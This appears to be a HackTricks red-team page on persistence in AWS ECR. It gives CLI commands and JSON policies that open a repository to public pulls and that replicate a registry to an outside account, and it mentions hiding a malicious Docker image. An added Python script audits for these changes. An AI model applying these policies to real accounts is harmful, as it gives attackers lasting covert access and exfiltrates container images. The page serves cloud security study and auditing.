AWS - ECR Persistence

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!


ECR

For more information check:

AWS - ECR Enum

Hidden Docker Image with Malicious Code

An attacker could upload a Docker image containing malicious code to an ECR repository and use it to maintain persistence in the target AWS account. The attacker could then deploy the malicious image to various services within the account, such as Amazon ECS or EKS, in a stealthy manner.

Repository Policy

Add a policy to a single repository granting yourself (or everybody) access to a repository:

aws ecr set-repository-policy \
    --repository-name cluster-autoscaler \
    --policy-text file:///tmp/my-policy.json

# With a .json such as

{
    "Version" : "2008-10-17",
    "Statement" : [
        {
            "Sid" : "allow public pull",
            "Effect" : "Allow",
            "Principal" : "*",
            "Action" : [
                "ecr:BatchCheckLayerAvailability",
                "ecr:BatchGetImage",
                "ecr:GetDownloadUrlForLayer"
            ]
        }
    ]
}

Note that ECR requires that users have permission to make calls to the ecr:GetAuthorizationToken API through an IAM policy before they can authenticate to a registry and push or pull any images from any Amazon ECR repository.

Registry Policy & Cross-account Replication

It's possible to automatically replicate a registry to an external account by configuring cross-account replication, where you indicate the external account to which you want to replicate the registry.

First, you need to give the external account access over the registry with a registry policy like:

aws ecr put-registry-policy --policy-text file://my-policy.json

# With a .json like:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "asdasd",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::947247140022:root"
      },
      "Action": [
        "ecr:CreateRepository",
        "ecr:ReplicateImage"
      ],
      "Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
    }
  ]
}

Then apply the replication config:

aws ecr put-replication-configuration \
     --replication-configuration file://replication-settings.json \
     --region us-west-2

# With a .json such as:
{
	"rules": [{
		"destinations": [{
			"region": "destination_region",
			"registryId": "destination_accountId"
		}],
		"repositoryFilters": [{
			"filter": "repository_prefix_name",
			"filterType": "PREFIX_MATCH"
		}]
	}]
}
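
To audit an account for the policy and replication changes described above, the following added example (not HackTricks' code) flags Allow statements open to "*" or to another account, and replication destinations outside your own account. It expects the policyText returned by aws ecr get-repository-policy or aws ecr get-registry-policy and the JSON from aws ecr describe-registry; the function names and the sample account IDs are assumptions made up for the example.

```python
import json
import re

# Matches a bare 12-digit account ID or an IAM/STS ARN and captures the account ID.
ACCOUNT_RE = re.compile(r"^(?:arn:[\w-]+:(?:iam|sts)::)?(\d{12})(?::.*)?$")

def _as_list(value):
    return value if isinstance(value, list) else [value]

def external_principals(policy_text, own_account):
    """Return (Sid, principal) for Allow statements open to '*' or to another account.
    Condition blocks are not evaluated, so treat hits as items to review."""
    findings = []
    for stmt in _as_list(json.loads(policy_text).get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        principal = stmt.get("Principal", {})
        # "Principal": "*" and "Principal": {"AWS": "*"} both mean anyone.
        values = [principal] if isinstance(principal, str) else [
            v for vals in principal.values() for v in _as_list(vals)]
        for value in values:
            match = ACCOUNT_RE.match(value)
            if value == "*" or (match and match.group(1) != own_account):
                findings.append((stmt.get("Sid", ""), value))
    return findings

def external_replication(registry, own_account):
    """Return (region, registryId) for replication destinations outside own_account."""
    rules = registry.get("replicationConfiguration", {}).get("rules", [])
    return [(d["region"], d["registryId"]) for rule in rules
            for d in rule.get("destinations", []) if d["registryId"] != own_account]

# Constructed sample data; account IDs are placeholders.
OWN = "111111111111"
REPO_POLICY = json.dumps({"Version": "2008-10-17", "Statement": [
    {"Sid": "allow public pull", "Effect": "Allow", "Principal": "*",
     "Action": ["ecr:BatchGetImage", "ecr:GetDownloadUrlForLayer"]},
    {"Sid": "ci", "Effect": "Allow",
     "Principal": {"AWS": ["arn:aws:iam::111111111111:role/ci",
                           "arn:aws:iam::222222222222:root"]},
     "Action": "ecr:BatchGetImage"}]})
REGISTRY = {"registryId": OWN, "replicationConfiguration": {"rules": [{
    "destinations": [{"region": "eu-west-1", "registryId": OWN},
                     {"region": "us-west-2", "registryId": "222222222222"}]}]}}

if __name__ == "__main__":
    print(external_principals(REPO_POLICY, OWN))
    print(external_replication(REGISTRY, OWN))
```

Run it per repository and per region, since repository policies, the registry policy and the replication configuration are all regional settings.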